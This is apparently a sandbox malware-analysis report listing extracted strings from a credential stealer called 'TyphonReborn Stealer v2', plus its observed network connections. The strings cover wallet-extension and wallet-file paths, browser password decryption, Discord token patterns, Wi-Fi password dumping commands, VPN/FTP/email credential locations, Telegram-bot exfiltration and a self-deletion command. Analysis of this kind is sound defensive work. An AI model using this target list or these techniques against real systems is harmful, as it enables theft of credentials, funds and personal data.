^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$
^(62[0-9]{14,17})$
4[0-9]{12}(?:[0-9]{3})?$
^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$
3[47][0-9]{13}$
4MD9A52F5A2A5DB5D3F3E3D3D8A8DB3
JJW0V7PQ5B2B
0GM3a{(wr'rb &dsByA2b8Qr {7Z;PZ-[5eWh+=j
J]+{Q;=j
6PF1YJ
https://t.me/typhon_shop
5120
.txt|.rtf|.doc|.docx|.pdf|.xlsx|.xls|.ppt|.pptx|.accdb|.png|.jpeg|.jpg|.cs|.cpp|.p12
1
Ukraine|Russia|Netherlands
Crypto Wallets [BROWSER]
\Crypto Wallets [BROWSER]
Crypto Wallets [APP]
\Crypto Wallets [APP]
Software
-Qt
strDataDir
\wallets
Chrome_Binance
\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Chrome_Bitapp
\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Chrome_Coin98
\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Chrome_Equal
\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Chrome_Guild
\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Chrome_Iconex
\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel
Chrome_Math
\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Chrome_Mobox
\Google\Chrome\User Data\Default\Local Extension Settings\fcckkdbjnoikooededlapcalpionmalo
Chrome_Phantom
\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Chrome_Tron
\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Chrome_XinPay
\Google\Chrome\User Data\Default\Local Extension Settings\bocpokimicclpaiekenaeelehdjllofo
Chrome_Ton
\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd
Chrome_Metamask
\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Chrome_Sollet
\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Chrome_Slope
\Google\Chrome\User Data\Default\Local Extension Settings\pocmplpaccanhmnllbbkpgfliimjljgo
Chrome_Starcoin
\Google\Chrome\User Data\Default\Local Extension Settings\mfhbebgoclkghebffdldpobeajmbecfk
Chrome_Swash
\Google\Chrome\User Data\Default\Local Extension Settings\cmndjbecilbocjfkibfbifhngkdmjgog
Chrome_Finnie
\Google\Chrome\User Data\Default\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj
Chrome_Keplr
\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Chrome_Crocobit
\Google\Chrome\User Data\Default\Local Extension Settings\pnlfjmlcjdjgkddecgincndfgegkecke
Chrome_Oxygen
\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
Chrome_Nifty
\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Chrome_Liquality
\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Edge_Auvitas
\Microsoft\Edge\User Data\Default\Local Extension Settings\klfhbdnlcfcaccoakhceodhldjojboga
Edge_Math
\Microsoft\Edge\User Data\Default\Local Extension Settings\dfeccadlilpndjjohbjdblepmjeahlmm
Edge_Metamask
\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Edge_MTV
\Microsoft\Edge\User Data\Default\Local Extension Settings\oooiblbdpdlecigodndinbpfopomaegl
Edge_Rabet
\Microsoft\Edge\User Data\Default\Local Extension Settings\aanjhgiamnacdfnlfnmgehjikagdbafd
Edge_Ronin
\Microsoft\Edge\User Data\Default\Local Extension Settings\bblmcdckkhkhfhhpfcchlpalebmonecp
Edge_Yoroi
\Microsoft\Edge\User Data\Default\Local Extension Settings\akoiaibnepcedcplijmiamnaigbepmcb
Edge_Zilpay
\Microsoft\Edge\User Data\Default\Local Extension Settings\fbekallmnjoeggkefjkbebpineneilec
Edge_Exodus
\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold
Edge_Terra_Station
\Microsoft\Edge\User Data\Default\Local Extension Settings\ajkhoeiiokighlmdnlakpjfoobnjinie
Edge_Jaxx
\Microsoft\Edge\User Data\Default\Local Extension Settings\dmdimapfghaakeibppbfeokhgoikeoci
Zcash
\Zcash
Armory
\Armory
Bytecoin
\bytecoin
Jaxx
\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Exodus
\Exodus\exodus.wallet
Ethereum
\Ethereum\keystore
Electrum
\Electrum\wallets
AtomicWallet
\atomic\Local Storage\leveldb
Guarda
\Guarda\Local Storage\leveldb
Coinomi
\Coinomi\Coinomi\wallets
Litecoin
Dash
Bitcoin
\mozglue.dll
\nss3.dll
NSS_Init
PK11SDR_Decrypt
NSS_Shutdown
Failed to load NSS
oi_faggot_having_a_good_field_day_arent_you
DRIVE-
:
Grabber
Downloads
DropBox
OneDrive
TyphonReborn Stealer v2 by @lernaean_hydra0 & @StopDropNLoad
@
_
.zip
/c rmdir /S /Q "
"
cmd.exe
x
y
ProgramFiles
PROCESSOR_ARCHITEW6432
ProgramFiles(x86)
C:\Users\
\AppData\Roaming
Profiles
\logins.json
\key4.db
\places.sqlite
************************************************ * * * TyphonReborn Stealer v2 * * by @lernaean_hydra0 and @StopDropNLoad * * https://t.me/typhon_shop * ************************************************ ====...
[+] Machine name :
[+] Current date :
[+] Installed Languages :
[+] Current Language :
==================== SYSTEM DATA ==================== [+] Operating System :
[+] HWID :
[+] Installed Memory :
[+] Processor Name :
[+] Graphics Card Name :
[+] Battery status :
[+] Screen Metrics :
==================== NETWORK DATA ==================== [+] External IP :
[+] Internal IP :
[+] MAC Address :
[+] BSSID :
==================== LOCATION DATA ==================== [+] IP Based location: Country :
Region :
City :
ZIP code :
[+] BSSID based location:
Saving User Data...
\UserData.txt
\BuildID.txt
Saved User Data.
Saving Installed Softwares...
\InstalledSoftwares.txt
Saved Installed Softwares.
Saving system Info...
Saved System info
Saving Mail Clients...
Completed.
Saving Messaging softwares...
Saving FTP clients...
Saved FTP clients.
Saving browser data...
Saved browser data.
Saving Crypto wallets...
Saved crypto wallets.
Saving VPN clients...
Saved VPN clients...
Starting File Grabber...
\File Grabber
Finished File Grabbing operation.
.bat
xcxxxhcxxp 6xx50xxxxxx0xx1
TaxxxxsxxxkxxxKilxlx /Fx x/IxM xx
Tixxxmxxeoxxxut /Tx x2xxx /Nxxxoxbxrexxxxakx
/C
table
(
UNIQUE
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
\
Archive saved at:
🐍 New TyphonReborn Stealer v2 log! ---------- User Details ---------- User Name -
Machine Name -
Current Date -
Current Language -
---------- System info ---------- Operating System -
HWID -
Processor -
Graphics Card -
Battery Status -
RAM -
Screen Metrics -
---------- Network info ---------- External IP -
Internal IP -
BSSID -
MAC -
---------- Geo-Location data ---------- Country -
City -
Region -
ZIP code -
BSSID-based location -
---------- Statistics ----------
Cookies - {0}
Credit Cards - {0}
Passwords - {0}
Autofills - {0}
Crypto wallets - {0}
FTP Clients - {0}
VPN Clients - {0}
---------- //// \\\\ ---------- Build ID:
TyphonReborn Stealer v2 by @lernaean_hydra0 and @StopDropNLoad Archive status: Uploading to Telegram...
Sent log.
Document
Deleted archive
Error on client!!!
https://api.telegram.org/bot
/sendMessage?chat_id=
&text=
⛔ File not found!
/send
?chat_id=
NordVPN
NordVpn.exe*
user.config
//setting[@name='Username']/value
//setting[@name='Password']/value
\Accounts.txt
Username:
Password:
=======================
OpenVPN Connect\profiles
\profiles
ovpn
profiles\
ProtonVPN
ProtonVPN.exe
\user.config
VPN Clients
\NordVPN
\OpenVPN
\ProtonVPN
================ Drive name : {0} Drive type : {1} Total drive size : {2} GB Is drive ready : {3} Drive format : {4} ================
Drive Info.txt
root\CIMV2
SELECT * FROM Win32_Processor
Select * From Win32_ComputerSystem
TotalPhysicalMemory
MB
-1
SELECT * FROM Win32_VideoController
, (
%)
\Running Processes.txt
Process name:
PID:
Executable Path:
=================
Screenshot
_dd.MM.yyyy_HH.mm.ss
.jpeg
Screenshot.jpg
SELECT * FROM Win32_Product
>
,
.
Failed to get languages
HARDWARE\Description\System\CentralProcessor\0
Identifier
x86
x64
(Unknown)
Unknown System
SELECT * FROM win32_operatingsystem
No network adapters with an IPv4 address in the system!
http://api.ipify.org
Request failed
unknown
x2
Failed
https://api.mylnikov.org/geolocation/wifi?v=1.1&data=open&bssid=
{"result":200
"lat":
,
"lon":
"range":
Latitude:
Longitude:
Range:
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Not installed
N/A
country_name
country_code
region
r+r
postal
Not specified
axxHR0xxcHM6xxxxLy9pxcxGFxwxaS5jbxxxxxy8=
/json
ipapi.co/#c-sharp-v1.03
dd.MM.yyyy HH:mm:ss
/C chcp 65001 && netsh wlan show profile | findstr All
/C timeout /t 5 /nobreak > nul && netsh wlan show profile name="
" key=clear | findstr Key
/C timeout /t 5 /nobreak > nul && netsh wlan show networks mode=bssid
\Available Networks.txt
65001
Wifi name:
\Wifi Passwords.txt
{0} TRUE {1} FALSE {2} {3} {4}
Name: {0} Value: {1} Application: {2} Stealer: TyphonReborn Stealer v2 ==========================
email
e-mail
phone
name
username
usrname
register
login
bank
password
address
creditcard
checkout
dob
pin
zip
paypal
crypto
registration
customer
auth
key
Name: {0} Value: {1} Stealer: TyphonReborn Stealer v2 ==========================
Type: {0} Number: {1} Expiry: {2} Holder: {3} Stealer: TyphonReborn Stealer
/
URL: {0} Username: {1} Password: {2} Browser: {3} Stealer: TyphonReborn Stealer v2 ==========================
[\w-]{24}\.[\w-]{6}\.[\w-]{27}
mfa\.[\w-]{84}
(dQw4w9WgXcQ:)([^.*\['(.*)'\].*$][^"]*)
\discord\Local Storage\leveldb\
*.ldb
dQw4w9WgXcQ:
\Tokens.txt
os_crypt
encrypted_key
\discord\Local State
IM Clients
Discord
Telegram
Pidgin
ICQ
Signal
Skype
Tox
0001
\0001
Protocol:
Login:
Password:
\Pidgin Accounts.txt
.purple\accounts.xml
databases
Session Storage
Local Storage
sql
\databases
\Session Storage
\Local Storage
\sql
\config.json
Microsoft\Skype for Desktop
\Telegram Desktop\tdata
tdata
s
usertag
settings
key_data
tox
E-Mail Clients
Outlook
Thundirbird
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
SMTP Email Address
SMTP Server
POP3 Server
POP3 User Name
SMTP User Name
NNTP Email Address
NNTP User Name
NNTP Server
IMAP Server
IMAP User Name
Email
HTTP User
HTTP Server URL
POP3 User
IMAP User
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
\Outlook.txt
Password
2
:
{0}: {1}
^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
^(?!:\/\/)([a-zA-Z0-9-_]+\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
\Passwords.txt
\Cookies
\Cookies_("Thunderbird").txt
cookies.sqlite
moz_cookies
host
isSecure
path
expires_utc
value
Failed to copy files to decrypt passwords
logins.json
,"logins":\[
,"potentiallyVulnerablePasswords"
},
Failed to set profile!
hostname
encryptedUsername
encryptedPassword
Thunderbird Mail Client
key3.db
key4.db
cert9.db
Gaming Clients
\UPlay
\Stem
\Steam
\Minecraft
versions
bytes
yyyy-MM-dd h:mm:ss tt
\versions.txt
VERSION:
SIZE:
DATE:
mods
\Installed Mods.txt
Mod:
Size:
Date of creation:
screenshots
\Screenshots
\Screenshots\
profile
options
servers
logs
.minecraft
Software\\Valve\\Steam
SteamPath
Apps
Apps\
Installed
No
Yes
Running
Updating
\Apps.txt
Application
GameID:
Installed:
Running:
Updating:
\ssnf
ssfn
\ssnf\
config
\configs
vdf
\configs\
Autologin User:
AutoLoginUser
Remember password:
\SteamInfo.txt
Ubisoft Game Launcher
\FileZilla\
recentservers.xml
sitemanager.xml
Server
Pass
ftp://
Host
Port
URL:
Username:
=====================
\Hosts.txt
FTP Clients
FileZilla
WinSCP
\Logins.txt
URL:
UserName:
Password:
==========================
Software\Martin Prikryl\WinSCP 2\Sessions
HostName
UserName
PortNumber
A
10
B
11
C
12
D
13
E
14
F
15
ABCDEF
l O#V5oZuzEv\&^}Gn9n'peMk)QuV
l}Nmx.||7o*k _ry
luQ"rJ*`r`po.Cv\&^}GnK }Ww-V[pj]y
l(@ b`6Q"c Y'Zvk[y|
l m%rt?mVQLuIk TD
l U#[`V, rVvLuIk TD
l Vb`0QJVvL v[!tP
l I%Xt5o^"c Y'Zvk[y|
l0O#bdvlJVvL v[!tP
lJb*W/`;|L&"IkP`T'+qqk)ms{
lN b!` x1Q)_!`p&^}' AeNp&guc|
l}#Bo`1l:c'^FuI`_uN|
lU#[x6V(p W) V>_$kF%`  }X) k1W_"V#ex^ M(PwKR y2ZTu en=a%YQ*B|
l Q%rt5T)gwC kP('U-NeNp&gud6
l O#V0W-JWv{&sPk _'Q}a\|
l <Ibx.WpJVvL v[!tP
l svpQx,mOkTtn6
l}@X^vQ"c Y'Zvk[y|
l O#b -WpJV)[&sPk _'Q}a\|
lM bV0md;oVk_&Zv`P
l O"X|)md;o Rte3
l (Q#X`*PJlw^k.p&^}' AeNp&gud6
l O#b -WpJVvL v[!tP
l px?WrV;oV] E! _'T9n'peMk)QuV
luQ$}`)Ws;mOkTtn6
l7Mbd5Ws"c Y'Zvk[y|
l N%m`3TF"`w tsC$<e' A a\)"
lqIZ?Ws-mOkTtn6
l O|0lpJV){'JuI`_uN|
l @b%c|-V-pk[ry
l V"X 2Ws`7mOkTtn6
luQ bE3`/d"dC&e>e&J }P uW
l@mh*`s ,Q &]'^P][ UL,yB)ww-V^>c"L g,Wu&
luIx0Vs ,Q:st"_uI`_u|
luO$X^5Wt"g).LdE ry
l Q%rd?o, u
l7Mbd5o 4
l V%b-ox(T^
l O#b -WpJ lvp'^]'p
l ,Nb|rVr`po.C'>w d_'UN!
lqpVcg&c_%tsE't}]%oByGw3fu
luO#,T^2od'^X!d %oxM'sKeA-|wwC#u
Opera Software
\Web Data
\Login Data
\Network\Cookies
\Local State
\Credit Cards
\Credit Cards\CreditCards_(
)_[
].txt
\Cookies\Cookies_(
\ImportantAutofills.txt
\Autofills
\Autofills\Autofills_(
logins
origin_url
username_value
password_value
credit_cards
name_on_card
expiration_month
expiration_year
cookies
host_key
httponly
secure
encrypted_value
autofill
Opera
Thunderbird
).txt
Firefox
Waterfox
K-Melon
IceDragon
Cyberfox
Blackhawk
Pale Moon
":"([^"]+)"
.compressed
bouncycastle.crypto
costura.bouncycastle.crypto.dll.compressed
costura
costura.costura.dll.compressed
costura.costura.pdb.compressed
dotnetzip
costura.dotnetzip.dll.compressed
costura.dotnetzip.pdb.compressed
system.runtime.interopservices.runtimeinformation
costura.system.runtime.interopservices.runtimeinformation.dll.compressed
Total events
329
Read events
329
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
0
Unknown types
0

Dropped files

No data
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
7
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
3004
b9_v2.bin.exe
173.231.16.76:80
api.ipify.org
WEBNX
US
malicious
4
System
192.168.100.255:138
whitelisted
1076
svchost.exe
224.0.0.252:5355
unknown
2748
svchost.exe
239.255.255.250:1900
whitelisted
3004
b9_v2.bin.exe
64.185.227.155:80
api.ipify.org
WEBNX
US
malicious
3004
b9_v2.bin.exe
104.237.62.211:80
api.ipify.org
WEBNX
US
suspicious

DNS requests

Domain
IP
Reputation
api.ipify.org
  • 173.231.16.76
  • 64.185.227.155
  • 104.237.62.211
shared
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
b9_v2.bin